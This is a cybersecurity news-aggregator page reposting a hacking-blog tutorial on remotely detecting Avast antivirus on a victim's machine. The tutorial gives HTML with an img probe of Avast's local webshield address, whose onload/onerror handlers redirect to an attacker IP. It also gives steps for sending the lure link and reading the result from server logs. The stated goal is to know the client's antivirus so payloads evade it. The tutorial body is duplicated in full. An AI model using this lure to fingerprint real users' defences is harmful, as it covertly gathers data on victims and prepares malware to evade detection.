Welcome to our
Cyber Security News Aggregator
.Cyber Tzar
provide acyber security risk management
platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
How to detect Avast Antivirus remotely?
published on 2013-10-14 14:19:00 UTC by nirav desaiContent:
During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?
Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.
In above image you can see that avast logo which address is localhost:12080/$$avast-webshield$$/image001.png . So if in client machine avast is installed than that image is also located at that address , by examine image is exist or not we can know that whether avast is installed or not.
For this purpose victim should visit our link where we can check about image.So i am gonna use my apache server ; where i put three html page. One is our link which we gonna send to victim ; if image exist it redirect to other document ; & if image does not exist it redirect to third html page.
(1)Make blank html page & give it to name avst.html & put following code in that html page.
<meta http-equiv="refresh" content="0; url=http://google.com/">
(2)Now make second html page & give it to name ntavst.html & put same code in that page.
<meta http-equiv="refresh" content="0; url=http://google.com/">
(3)Make third & final html page and give it to name exp.html & put following code.
<div dir="ltr" style="text-align: left;" trbidi="on">
<img src="http://127.0.0.1:12080/$$avast-webshield$$"/image001.png" onload="document.location='http://180.215.198.150/avast.html'" onerror="document.location='http://180.215.198.150/ntavast.html'" />
Note:- Change your i.p in above code.
Now put these all document in /var/www/ folder.And send link of exp.html to victim
So if avast installed then it redirect to avast.html page & finally redirect to google.com & if it does not installed then it will redirect to ntavst.html page & then redirect to google.com
Now check your apache log file from \var\log\apache2\log ; you can check if avst.html page has been visited or ntavst.html page.
PS: You can use cobalt strike `s system profiler which get you os version; browser detail; java version ; adobe reader version & flash version.
Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.
In above image you can see that avast logo which address is localhost:12080/$$avast-webshield$$/image001.png . So if in client machine avast is installed than that image is also located at that address , by examine image is exist or not we can know that whether avast is installed or not.
For this purpose victim should visit our link where we can check about image.So i am gonna use my apache server ; where i put three html page. One is our link which we gonna send to victim ; if image exist it redirect to other document ; & if image does not exist it redirect to third html page.
(1)Make blank html page & give it to name avst.html & put following code in that html page.
<meta http-equiv="refresh" content="0; url=http://google.com/">
(2)Now make second html page & give it to name ntavst.html & put same code in that page.
<meta http-equiv="refresh" content="0; url=http://google.com/">
(3)Make third & final html page and give it to name exp.html & put following code.
<div dir="ltr" style="text-align: left;" trbidi="on">
<img src="http://127.0.0.1:12080/$$avast-webshield$$"/image001.png" onload="document.location='http://180.215.198.150/avast.html'" onerror="document.location='http://180.215.198.150/ntavast.html'" />
Note:- Change your i.p in above code.
Now put these all document in /var/www/ folder.And send link of exp.html to victim
So if avast installed then it redirect to avast.html page & finally redirect to google.com & if it does not installed then it will redirect to ntavst.html page & then redirect to google.com
Now check your apache log file from \var\log\apache2\log ; you can check if avst.html page has been visited or ntavst.html page.
https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html
Published: 2013 10 14 14:19:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Views: 1
